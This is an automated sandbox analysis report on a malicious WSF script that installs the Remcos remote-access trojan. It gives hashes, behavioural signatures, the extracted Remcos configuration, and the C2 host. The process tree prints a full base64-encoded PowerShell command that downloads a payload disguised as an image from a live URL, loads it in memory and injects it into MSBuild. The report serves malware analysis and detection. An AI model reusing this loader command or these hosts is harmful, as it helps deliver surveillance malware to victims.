Analysis

  • max time kernel
    298s
  • max time network
    294s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-12-2024 06:48

General

  • Target

    Order_DEC2024.wsf

  • Size

    3KB

  • MD5

    c209a2bdfa9028df5da14abdc1fc58ce

  • SHA1

    17b2e2192cccdde3bc51197285ccdc5a0dc80587

  • SHA256

    a2e71163d56c1feb4714e20d8b559bcf005e10b9044d9565afa0e257b0eb4d62

  • SHA512

    0d7a39070b32d140bfcf01f125eea94d9016d0e641e461d1d2a8d0b42d5d0cc8388fccc1c08272ed09bde710cbd4154b281e638b9f608e7e0b344d6aa3bd54c9

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20

exe.dropper

https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg%20

Extracted

Family

remcos

Botnet

4

C2

lewisham1122.ddnsking.com:6426

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-L31JDJ

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 4 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Order_DEC2024.wsf"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1200
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $maremma = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JG5lbmhvID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGFsdm9yb3RhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNob3N0cmEgPSAkYWx2b3JvdGFyLkRvd25sb2FkRGF0YSgkbmVuaG8pOyRwZXJpZ29zYW1lbnRlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNob3N0cmEpOyRtZXhlcm90byA9ICc8PEJBU0U2NF9TVEFSVD4+JzskbHVwYW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGVuY2FyZGlyID0gJHBlcmlnb3NhbWVudGUuSW5kZXhPZigkbWV4ZXJvdG8pOyRuaXN0byA9ICRwZXJpZ29zYW1lbnRlLkluZGV4T2YoJGx1cGFudGUpOyRlbmNhcmRpciAtZ2UgMCAtYW5kICRuaXN0byAtZ3QgJGVuY2FyZGlyOyRlbmNhcmRpciArPSAkbWV4ZXJvdG8uTGVuZ3RoOyRjdW5ldGEgPSAkbmlzdG8gLSAkZW5jYXJkaXI7JGF1bGljaXNtbyA9ICRwZXJpZ29zYW1lbnRlLlN1YnN0cmluZygkZW5jYXJkaXIsICRjdW5ldGEpOyRkZWJpbGl0YW1lbnRvID0gLWpvaW4gKCRhdWxpY2lzbW8uVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGF1bGljaXNtby5MZW5ndGgpXTskZWxlbWllaXJhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGViaWxpdGFtZW50byk7JGxldmFkb3VyYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGVsZW1pZWlyYSk7JGVzY290YSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlc2NvdGEuSW52b2tlKCRudWxsLCBAKCcwL2ZoY3dvL3IvZWUuZXRzYXAvLzpzcHR0aCcsICdiaWNoYW5jcm9zJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsICdNU0J1aWxkJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnMScsJ2JpY2hhbmNyb3MnKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$escumar = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($maremma));Invoke-Expression $escumar
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4936
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:4048

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat

    Filesize

    144B

    MD5

    3b232cd2cb758426fd696828314c1532

    SHA1

    a5b600ce1a1f82a962912928534a84db7cb171d6

    SHA256

    c2e543bb734a7bb591d08c65f3f278821b26d6f5923e0e183e3e39f03a2d0c02

    SHA512

    5320dcac4a89951033a8c48ad23c79518be2f6e4cd3fbab3316921b9a5a5dabdd909f4f4e4f5e4eb2b51a6a8a810ba448a0ed550ae43508aa5b880ab6ae35e3b

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pw2lnzry.gps.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/4048-54-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4048-62-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4048-101-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4048-32-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4048-34-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4048-93-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4048-94-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4048-78-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4048-18-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4048-21-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4048-77-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4048-23-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4048-24-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4048-28-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4048-26-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4048-29-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4048-30-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4048-31-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4048-70-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4048-102-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4048-37-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4048-36-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4048-39-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4048-69-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4048-45-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4048-61-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4048-53-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4936-0-0x00007FFBB9E73000-0x00007FFBB9E75000-memory.dmp

    Filesize

    8KB

  • memory/4936-11-0x00007FFBB9E70000-0x00007FFBBA931000-memory.dmp

    Filesize

    10.8MB

  • memory/4936-10-0x000001A477550000-0x000001A477572000-memory.dmp

    Filesize

    136KB

  • memory/4936-13-0x00007FFBB9E70000-0x00007FFBBA931000-memory.dmp

    Filesize

    10.8MB

  • memory/4936-22-0x00007FFBB9E70000-0x00007FFBBA931000-memory.dmp

    Filesize

    10.8MB

  • memory/4936-17-0x000001A477BF0000-0x000001A477D48000-memory.dmp

    Filesize

    1.3MB

  • memory/4936-16-0x00007FFBB9E70000-0x00007FFBBA931000-memory.dmp

    Filesize

    10.8MB

  • memory/4936-15-0x00007FFBB9E73000-0x00007FFBB9E75000-memory.dmp

    Filesize

    8KB

  • memory/4936-14-0x00007FFBB9E70000-0x00007FFBBA931000-memory.dmp

    Filesize

    10.8MB

  • memory/4936-12-0x00007FFBB9E70000-0x00007FFBBA931000-memory.dmp

    Filesize

    10.8MB